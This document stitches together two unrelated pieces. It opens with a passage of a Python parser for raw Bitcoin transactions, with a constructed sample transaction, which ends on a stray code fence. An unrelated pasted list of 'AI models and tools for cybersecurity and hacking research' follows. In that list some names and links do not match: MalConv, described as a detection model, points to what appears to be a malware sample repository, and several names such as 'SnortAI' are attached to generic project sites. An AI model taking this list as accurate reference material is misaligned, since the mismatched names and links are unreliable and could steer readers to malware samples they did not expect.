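def read_varint(stream):
    """CompactSize integer used for counts and script lengths."""
    first = take(stream, 1)[0]
    if first < 0xFD:
        return first
    return read_u(stream, {0xFD: 2, 0xFE: 4, 0xFF: 8}[first])


def script_type(spk):
    """Classify a scriptPubKey by its standard byte template."""
    if len(spk) == 25 and spk[:3] == b"\x76\xa9\x14" and spk[23:] == b"\x88\xac":
        return "p2pkh"
    if len(spk) == 23 and spk[:2] == b"\xa9\x14" and spk[22:] == b"\x87":
        return "p2sh"
    if len(spk) == 22 and spk[:2] == b"\x00\x14":
        return "p2wpkh"
    if len(spk) == 34 and spk[:2] == b"\x00\x20":
        return "p2wsh"
    if spk[:1] == b"\x6a":
        return "op_return"
    return "nonstandard"


def parse_tx(raw_hex):
    """Parse a hex-encoded transaction into a dict of its fields."""
    s = BytesIO(bytes.fromhex(raw_hex))
    version = read_u(s, 4)
    n_in = read_varint(s)
    segwit = False
    if n_in == 0:
        # SegWit serialization: marker byte 0x00 followed by flag byte 0x01.
        if take(s, 1) != b"\x01":
            raise ValueError("zero inputs and no SegWit flag")
        segwit = True
        n_in = read_varint(s)
    vin = []
    for _ in range(n_in):
        txid = take(s, 32)[::-1].hex()  # shown byte-reversed, as explorers do
        index = read_u(s, 4)
        script_sig = take(s, read_varint(s)).hex()
        vin.append({"txid": txid, "vout": index, "scriptSig": script_sig,
                    "sequence": read_u(s, 4), "witness": []})
    vout = []
    for n in range(read_varint(s)):
        value = read_u(s, 8)
        spk = take(s, read_varint(s))
        vout.append({"n": n, "value_sat": value,
                     "scriptPubKey": spk.hex(), "type": script_type(spk)})
    if segwit:
        # One witness stack per input, stored after all outputs.
        for txin in vin:
            for _ in range(read_varint(s)):
                txin["witness"].append(take(s, read_varint(s)).hex())
    locktime = read_u(s, 4)
    if s.read(1):
        raise ValueError("trailing bytes after locktime")
    return {"version": version, "segwit": segwit, "vin": vin,
            "vout": vout, "locktime": locktime}


# Constructed sample (not a real transaction): one unsigned input, two outputs.
SAMPLE_TX_HEX = (
    (2).to_bytes(4, "little")                 # version
    + b"\x01"                                 # input count
    + bytes(range(32))                        # previous txid, internal byte order
    + (1).to_bytes(4, "little")               # previous output index
    + b"\x00"                                 # empty scriptSig
    + (0xFFFFFFFD).to_bytes(4, "little")      # sequence
    + b"\x02"                                 # output count
    + (50_000).to_bytes(8, "little") + b"\x17" + b"\xa9\x14" + b"\x11" * 20 + b"\x87"
    + (12_345).to_bytes(8, "little") + b"\x19" + b"\x76\xa9\x14" + b"\x22" * 20 + b"\x88\xac"
    + (0).to_bytes(4, "little")               # locktime
).hex()

if __name__ == "__main__":
    import json
    print(json.dumps(parse_tx(SAMPLE_TX_HEX), indent=2))
```

Comparing this output with `bitcoin-cli decoderawtransaction` on the same hex is a quick way to confirm that a wallet or explorer under test interprets byte order, script lengths and the SegWit marker the same way the node does.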
🦑Top Free Local AI
Open LLM Leaderboard
https://huggingface.co/collections/open-llm-leaderboard/open-llm-leaderboard-best-models-652d6c7965a4619fb5c27a03
🦑 AI models and tools for cybersecurity and hacking research
1. Code Analysis and Security Tools
- CodeBERT: AI model for secure code analysis.
URL: [https://huggingface.co/microsoft/codebert-base](https://huggingface.co/microsoft/codebert-base)
- DeepCode by Snyk: Detects vulnerabilities in codebases.
URL: [https://www.deepcode.ai/](https://www.deepcode.ai/)
- Joern: Open-source code analysis tool designed for vulnerability discovery.
URL: [https://joern.io/](https://joern.io/)
2. Adversarial Models and Simulations
- DeepExploit: Automates penetration testing with AI-driven attacks.
URL: [https://github.com/13o-bbr-bbq/machine_learning_security](https://github.com/13o-bbr-bbq/machine_learning_security)
- TextAttack: Framework for generating adversarial text for NLP systems.
URL: [https://github.com/QData/TextAttack](https://github.com/QData/TextAttack)
- Foolbox: Test the robustness of AI models with adversarial inputs.
URL: [https://foolbox.readthedocs.io/](https://foolbox.readthedocs.io/)
3. Malware Detection and Threat Intelligence
- MalConv: Neural network for malware detection from raw binaries.
URL: [https://github.com/Endermanch/MalwareDatabase](https://github.com/Endermanch/MalwareDatabase)
- Cuckoo Sandbox AI: Analyze malware behavior with AI integration.
URL: [https://cuckoosandbox.org/](https://cuckoosandbox.org/)
- Viper Framework: Malware and binary analysis toolset.
URL: [https://github.com/viper-framework/viper](https://github.com/viper-framework/viper)
4. Image and Data Analysis Tools
- YOLO (You Only Look Once): Detect anomalies or objects in visual data.
URL: [https://github.com/ultralytics/yolov5](https://github.com/ultralytics/yolov5)
- AutoML Vision by Google: Train custom vision models for detecting tampering.
URL: [https://cloud.google.com/automl](https://cloud.google.com/automl)
5. Network and System Monitoring Tools
- SnortAI: Intrusion detection with machine learning enhancements.
URL: [https://www.snort.org/](https://www.snort.org/)
- Zeek AI (Bro): Network analysis framework extended with AI.
URL: [https://zeek.org/](https://zeek.org/)
- DeepPacket: AI-driven analysis of network packet data.
URL: [https://github.com/xiaokexiang/DeepPacket](https://github.com/xiaokexiang/DeepPacket)
6. General Security Tools with AI Features
- TriageML: Machine learning for automating malware triage.
URL: [https://github.com/fireeye/Triage](https://github.com/fireeye/Triage)
- AI-Hunter: AI-driven platform for detecting and investigating cyber threats.
URL: [https://www.criticalstart.com/ai-hunter/](https://www.criticalstart.com/ai-hunter/)
- ELK Stack with AI: Integrate AI plugins with the ELK Stack for advanced threat detection.
URL: [https://www.elastic.co/](https://www.elastic.co/)